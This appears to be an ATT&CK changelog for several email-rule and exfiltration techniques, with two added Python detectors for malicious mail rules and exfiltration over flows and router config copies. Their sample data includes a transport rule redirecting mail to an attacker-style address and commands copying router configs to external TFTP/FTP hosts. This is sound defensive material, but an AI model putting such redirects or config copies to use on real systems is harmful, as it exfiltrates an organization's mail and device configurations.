Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_deprecated |  | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User'] | 
values_changed
STIX Field | Old value | New value
modified | 2021-10-15 20:19:33.750000+00:00 | 2023-04-12 20:46:04.871000+00:00
x_mitre_data_sources[1] | Logon Session: Logon Session Creation | Application Log: Application Log Content
x_mitre_data_sources[2] | Application Log: Application Log Content | Logon Session: Logon Session Creation
x_mitre_version | 2.3 | 2.4

[T1114.003] Email Collection: Email Forwarding Rule

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
Old Description

Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)

New Description

Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.

New Detections:

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version |  | 3.1.0
x_mitre_deprecated |  | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User'] | 
values_changed
STIX Field | Old value | New value
modified | 2021-10-15 20:19:33.416000+00:00 | 2023-04-12 20:47:47.583000+00:00
description | (old description shown above) | (new description shown above)
external_references[1]['source_name'] | US-CERT TA18-068A 2018 | Mac Forwarding Rules
external_references[1]['description'] | US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019. | Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.
external_references[1]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-086A | https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac
external_references[4]['source_name'] | Mac Forwarding Rules | Microsoft Mail Flow Rules 2023
external_references[4]['description'] | Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021. | Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.
external_references[4]['url'] | https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac | https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | Old value | New value
external_references |  | {'source_name': 'US-CERT TA18-068A 2018', 'description': 'US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted by Cyber Actors. Retrieved October 2, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-086A'}
x_mitre_contributors |  | Liran Ravich, CardinalOps
x_mitre_data_sources |  | Command: Command Execution

[T1564.008] Hide Artifacts: Email Hiding Rules

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
Old Description

Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)

New Description

Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)

In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).
Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-12 15:22:29.599000+00:00 | 2023-04-12 20:42:20.079000+00:00
description | (old description shown above) | (new description shown above)
external_references[3]['source_name'] | Microsoft Inbox Rules | Microsoft Mail Flow Rules 2023
external_references[3]['description'] | Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021. | Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.
external_references[3]['url'] | https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59 | https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules
external_references[4]['source_name'] | Microsoft New-InboxRule | Microsoft Inbox Rules
external_references[4]['description'] | Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021. | Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.
external_references[4]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps | https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59
external_references[5]['source_name'] | Microsoft Set-InboxRule | Microsoft New-InboxRule
external_references[5]['description'] | Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021. | Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.
external_references[5]['url'] | https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps | https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps
external_references[6]['source_name'] | Microsoft Cloud App Security | Microsoft Set-InboxRule
external_references[6]['description'] | Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021. | Microsoft. (n.d.). Set-InboxRule. Retrieved June 7, 2021.
external_references[6]['url'] | https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154 | https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Cloud App Security', 'description': 'Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.', 'url': 'https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154'}
x_mitre_contributorsLiran Ravich, CardinalOps
x_mitre_data_sourcesFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification
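The updated description names the two things a defender can key on: the cmdlets that create or change rules (New-InboxRule, Set-InboxRule, and the organization-wide transport-rule equivalents) and the keyword filters malicious rules commonly use. The detector below is an added example written for this changelog; it is not ATT&CK or Microsoft code. It runs over constructed records shaped like Exchange Online unified audit log entries (UserId, Operation, and a Parameters list of Name/Value pairs); that record layout, the hide-action parameter names, and the keyword list are assumptions for the example, not something the page specifies.

```python
"""Flag inbox and transport rules that hide mail (ATT&CK T1564.008).

Added example. The audit records below are constructed in the shape of
Exchange Online unified audit log entries; the field names and the keyword
list are assumptions, not taken from the ATT&CK page.
"""
import json

# Cmdlets from the technique description plus their org-wide transport-rule equivalents.
RULE_OPERATIONS = {"New-InboxRule", "Set-InboxRule", "New-TransportRule", "Set-TransportRule"}
# Rule actions that take mail out of the user's sight (assumed parameter names).
HIDE_ACTIONS = {"DeleteMessage", "SoftDeleteMessage", "MoveToFolder", "MarkAsRead", "RedirectMessageTo"}
# Rule conditions that carry the words a rule matches on (assumed parameter names).
KEYWORD_CONDITIONS = {"SubjectContainsWords", "BodyContainsWords",
                      "SubjectOrBodyContainsWords", "FromAddressContainsWords"}
# Words the description says malicious rules commonly filter on, plus two assumed ones.
SUSPICIOUS_WORDS = {"malware", "suspicious", "phish", "hack", "incident"}

def parse_record(line):
    """One JSON audit record -> (user, operation, {parameter: value})."""
    rec = json.loads(line)
    params = {p["Name"]: str(p.get("Value", "")) for p in rec.get("Parameters", [])}
    return rec.get("UserId", "?"), rec.get("Operation", ""), params

def suspicious_keywords(params):
    """Collect ';'-separated condition words and keep those that look like alert filtering."""
    words = set()
    for name in KEYWORD_CONDITIONS & set(params):
        words.update(w.strip().lower() for w in params[name].split(";") if w.strip())
    return {w for w in words if any(s in w for s in SUSPICIOUS_WORDS)}

def evaluate(line):
    """Return (user, operation, reason) for a rule that hides mail, else None."""
    user, op, params = parse_record(line)
    if op not in RULE_OPERATIONS:
        return None
    hide = sorted(HIDE_ACTIONS & set(params))
    hits = sorted(suspicious_keywords(params))
    org_wide = op.endswith("TransportRule")
    if hide and hits:
        return (user, op, f"hides mail ({', '.join(hide)}) matching {', '.join(hits)}")
    if org_wide and hide:
        # A transport rule acts on everyone's mail, so hiding/redirecting alone is worth review.
        return (user, op, f"organization-wide rule that hides or redirects mail ({', '.join(hide)})")
    return None

def scan(lines):
    """Run evaluate() over a sequence of audit-log lines and keep the findings."""
    return [f for f in map(evaluate, lines) if f]

# Constructed sample records (not real tenant data).
SAMPLE_AUDIT_LOG = [
    json.dumps({"UserId": "alice@corp.example", "Operation": "New-InboxRule",
                "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                               {"Name": "FromAddressContainsWords", "Value": "news@vendor.example"},
                               {"Name": "MoveToFolder", "Value": "Newsletters"}]}),
    json.dumps({"UserId": "bob@corp.example", "Operation": "Set-InboxRule",
                "Parameters": [{"Name": "Identity", "Value": "Clean up"},
                               {"Name": "SubjectOrBodyContainsWords", "Value": "phish;hacked;malware;suspicious"},
                               {"Name": "DeleteMessage", "Value": "True"},
                               {"Name": "MarkAsRead", "Value": "True"}]}),
    json.dumps({"UserId": "admin@corp.example", "Operation": "New-TransportRule",
                "Parameters": [{"Name": "Name", "Value": "Archive"},
                               {"Name": "SubjectContainsWords", "Value": "security incident notification"},
                               {"Name": "DeleteMessage", "Value": "True"}]}),
    json.dumps({"UserId": "eve@corp.example", "Operation": "New-TransportRule",
                "Parameters": [{"Name": "Name", "Value": "Journal"},
                               {"Name": "RedirectMessageTo", "Value": "collector@attacker.example"}]}),
    json.dumps({"UserId": "carol@corp.example", "Operation": "MailItemsAccessed", "Parameters": []}),
]

if __name__ == "__main__":
    for user, op, reason in scan(SAMPLE_AUDIT_LOG):
        print(f"{user:22} {op:18} {reason}")
```

Alice's newsletter rule moves mail but matches nothing alert-like, so it is left alone; Bob's rule deletes and marks read anything mentioning phishing or malware, and both transport rules fire because they act on the whole organization's mail.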

[T1611] Escape to Host

Current version: 1.4

Version changed from: 1.3 → 1.4

New Mitigations:

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-21 20:03:06.707000+00:00 → 2023-04-15 16:21:04.265000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.3 → 1.4
iterable_item_added
STIX Field: New Value
x_mitre_data_sources: Container: Container Creation
x_mitre_data_sources: Process: Process Creation
iterable_item_removed
STIX Field: Old value
x_mitre_data_sources: Process: Process Creation
x_mitre_data_sources: Container: Container Creation

[T1048] Exfiltration Over Alternative Protocol

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux `curl` may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)

New Description
Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux `curl` may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
x_mitre_network_requirements: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-15 22:49:28.766000+00:00 → 2023-04-15 00:58:36.287000+00:00
description: (old and new text shown above under Old Description / New Description)
external_references[1]['source_name']: Palo Alto OilRig Oct 2016 → University of Birmingham C2
external_references[1]['description']: Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017. → Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
external_references[1]['url']: http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/ → https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
external_references[2]['source_name']: 20 macOS Common Tools and Techniques → Palo Alto OilRig Oct 2016
external_references[2]['description']: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021. → Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
external_references[2]['url']: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ → http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/
external_references[3]['source_name']: University of Birmingham C2 → 20 macOS Common Tools and Techniques
external_references[3]['description']: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. → Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
external_references[3]['url']: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf → https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
x_mitre_version: 1.3 → 1.4
x_mitre_data_sources[3]: Command: Command Execution → Cloud Storage: Cloud Storage Access
iterable_item_added
STIX Field: New Value
x_mitre_data_sources: Application Log: Application Log Content
x_mitre_data_sources: Network Traffic: Network Connection Creation
x_mitre_data_sources: Command: Command Execution
x_mitre_platforms: Office 365
x_mitre_platforms: SaaS
x_mitre_platforms: IaaS
x_mitre_platforms: Google Workspace
x_mitre_platforms: Network
iterable_item_removed
STIX Field: Old value
x_mitre_data_sources: Network Traffic: Network Connection Creation

[T1041] Exfiltration Over C2 Channel

Current version: 2.2

Version changed from: 2.1 → 2.2

Dropped Mitigations:

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
x_mitre_network_requirements: False
values_changed
STIX Field: Old value → New Value
modified: 2021-10-15 22:45:50.620000+00:00 → 2023-04-07 17:09:14.040000+00:00
x_mitre_data_sources[0]: Network Traffic: Network Traffic Content → File: File Access
x_mitre_data_sources[1]: Command: Command Execution → Network Traffic: Network Traffic Content
x_mitre_data_sources[3]: Network Traffic: Network Connection Creation → Command: Command Execution
x_mitre_data_sources[4]: File: File Access → Network Traffic: Network Connection Creation
x_mitre_version: 2.1 → 2.2

[T1048.003] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.

New Description
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco) Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields.
Details
dictionary_item_added
STIX Field: New Value
x_mitre_network_requirements: False
values_changed
STIX Field: Old value → New Value
modified: 2022-04-12 19:57:45.277000+00:00 → 2023-04-12 23:39:25.476000+00:00
description: (old and new text shown above under Old Description / New Description)
external_references[1]['source_name']: University of Birmingham C2 → copy_cmd_cisco
external_references[1]['description']: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. → Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.
external_references[1]['url']: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf → https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[1]: Network Traffic: Network Traffic Content → Command: Command Execution
x_mitre_data_sources[2]: Command: Command Execution → Network Traffic: Network Connection Creation
x_mitre_data_sources[4]: Network Traffic: Network Connection Creation → Network Traffic: Network Traffic Content
x_mitre_detection (old): Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
x_mitre_detection (new): Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) For network infrastructure devices, collect AAA logging to monitor for `copy` commands being run to exfiltrate configuration files to non-standard destinations over unencrypted protocols such as TFTP.
x_mitre_version: 2.0 → 2.1
iterable_item_added
STIX Field: New Value
external_references: {'source_name': 'University of Birmingham C2', 'description': 'Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.', 'url': 'https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf'}
x_mitre_contributors: Austin Clark, @c2defense
x_mitre_platforms: Network
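The T1048 change above broadens the technique to cloud consoles and APIs, and the T1048.003 detection text adds two concrete checks: flows where a client sends far more than it receives, and AAA command accounting on network devices showing `copy` of a configuration to a non-standard destination over a clear-text transport such as TFTP. The block below is an added example that implements both checks over constructed data; it is not ATT&CK, Cisco, or vendor code. The flow summary format (`src,dst,proto,dport,bytes_out,bytes_in`), the TACACS+-style accounting line layout, the byte and ratio thresholds, and the approved backup host are all assumptions made for the example.

```python
"""Two exfiltration checks from the T1048 / T1048.003 detection text.

Added example, not from the ATT&CK page. Record formats and thresholds are
assumptions: flow lines approximate a NetFlow-style summary and AAA lines
approximate TACACS+ command accounting as forwarded to syslog.
"""
import re
from ipaddress import ip_address, ip_network

INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
APPROVED_BACKUP_HOSTS = {"10.0.0.20"}      # assumed: the one sanctioned config-backup server
CLEAR_SCHEMES = {"tftp", "ftp", "http"}    # transports that carry the config in the clear

def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

# --- Check 1: a client sending significantly more than it receives ---------
def asymmetric_flows(flow_lines, ratio=10.0, min_bytes=1_000_000):
    """Flag outbound flows to external hosts whose upload volume dwarfs the download."""
    flagged = []
    for line in flow_lines:
        src, dst, proto, dport, out_b, in_b = line.strip().split(",")
        out_b, in_b = int(out_b), int(in_b)
        if is_internal(dst):
            continue                     # internal transfers are out of scope here
        if out_b >= min_bytes and out_b >= ratio * max(in_b, 1):
            flagged.append({"src": src, "dst": dst, "proto": proto, "dport": int(dport),
                            "ratio": round(out_b / max(in_b, 1), 1)})
    return flagged

# --- Check 2: `copy <config> <clear-text URL>` in AAA command accounting ----
CMD_RE = re.compile(r"\bcmd=(?P<cmd>.+?)(?:\s*<cr>)?\s*$")
DEST_RE = re.compile(r"^(?P<scheme>[a-z]+):(?://(?P<host>[^/]*))?")

def suspicious_copy_commands(aaa_lines):
    """Flag copy commands whose destination is a clear-text transport to an unapproved host."""
    flagged = []
    for line in aaa_lines:
        m = CMD_RE.search(line)
        if not m:
            continue
        parts = m.group("cmd").split()
        if len(parts) < 3 or parts[0] != "copy":
            continue
        source, dest = parts[1], parts[2]
        d = DEST_RE.match(dest)
        if not d:
            continue                     # destination is not a URL-style target at all
        scheme = d.group("scheme")
        host = d.group("host") or "<prompted>"   # 'copy running-config tftp:' asks interactively
        if scheme in CLEAR_SCHEMES and host not in APPROVED_BACKUP_HOSTS:
            flagged.append({"source": source, "scheme": scheme, "host": host, "line": line.strip()})
    return flagged

# Constructed samples (not real traffic or device logs).
SAMPLE_FLOWS = [
    "10.0.0.55,10.0.0.20,tcp,445,5000000,400000",      # internal backup, ignored
    "10.0.0.55,203.0.113.9,udp,53,2400000,120000",     # 2.4 MB out over DNS: flagged
    "10.0.0.60,93.184.216.34,tcp,443,80000,3000000",   # ordinary download, not flagged
    "10.0.0.61,198.51.100.7,tcp,21,1500000,12000",     # FTP upload: flagged
]
SAMPLE_AAA = [
    "Apr 12 10:22:01 10.0.0.1 r1 tty2 10.0.0.55 stop task_id=41 service=shell priv-lvl=15 cmd=show running-config <cr>",
    "Apr 12 10:23:10 10.0.0.1 r1 tty2 10.0.0.55 stop task_id=42 service=shell priv-lvl=15 cmd=copy running-config tftp://10.0.0.20/r1-backup.cfg <cr>",
    "Apr 12 10:25:44 10.0.0.1 r1 tty2 10.0.0.55 stop task_id=43 service=shell priv-lvl=15 cmd=copy running-config tftp://203.0.113.9/r1.cfg <cr>",
    "Apr 12 10:26:02 10.0.0.1 r1 tty2 10.0.0.55 stop task_id=44 service=shell priv-lvl=15 cmd=copy startup-config scp://10.0.0.20/r1.cfg <cr>",
    "Apr 12 10:27:30 10.0.0.1 r1 tty3 10.0.0.61 stop task_id=45 service=shell priv-lvl=15 cmd=copy running-config ftp://198.51.100.7/c.cfg <cr>",
]

if __name__ == "__main__":
    for f in asymmetric_flows(SAMPLE_FLOWS):
        print(f"asymmetric flow {f['src']} -> {f['dst']}:{f['dport']}/{f['proto']} (out/in = {f['ratio']}x)")
    for c in suspicious_copy_commands(SAMPLE_AAA):
        print(f"config copy of {c['source']} via {c['scheme']} to {c['host']}")
```

The `scp://` copy to the approved host is deliberately not flagged: the detection text targets unencrypted transports to non-standard destinations, and a sanctioned backup over an encrypted channel is the baseline the alert should be measured against.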

[T1190] Exploit Public-Facing Application

Current version: 2.4

Version changed from: 2.3 → 2.4


Old Description
Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

New Description
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration. Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies. Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

Dropped Mitigations:

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-04-19 17:06:53.032000+00:00 → 2023-04-14 22:18:39.190000+00:00
description: (old and new text shown above under Old Description / New Description)
external_references[3]['source_name']: NVD CVE-2016-6662 → Wired Russia Cyberwar
external_references[3]['description']: National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018. → Greenberg, A. (2022, November 10). Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.
external_references[3]['url']: https://nvd.nist.gov/vuln/detail/CVE-2016-6662 → https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/
external_references[4]['source_name']: NVD CVE-2014-7169 → Mandiant Fortinet Zero Day
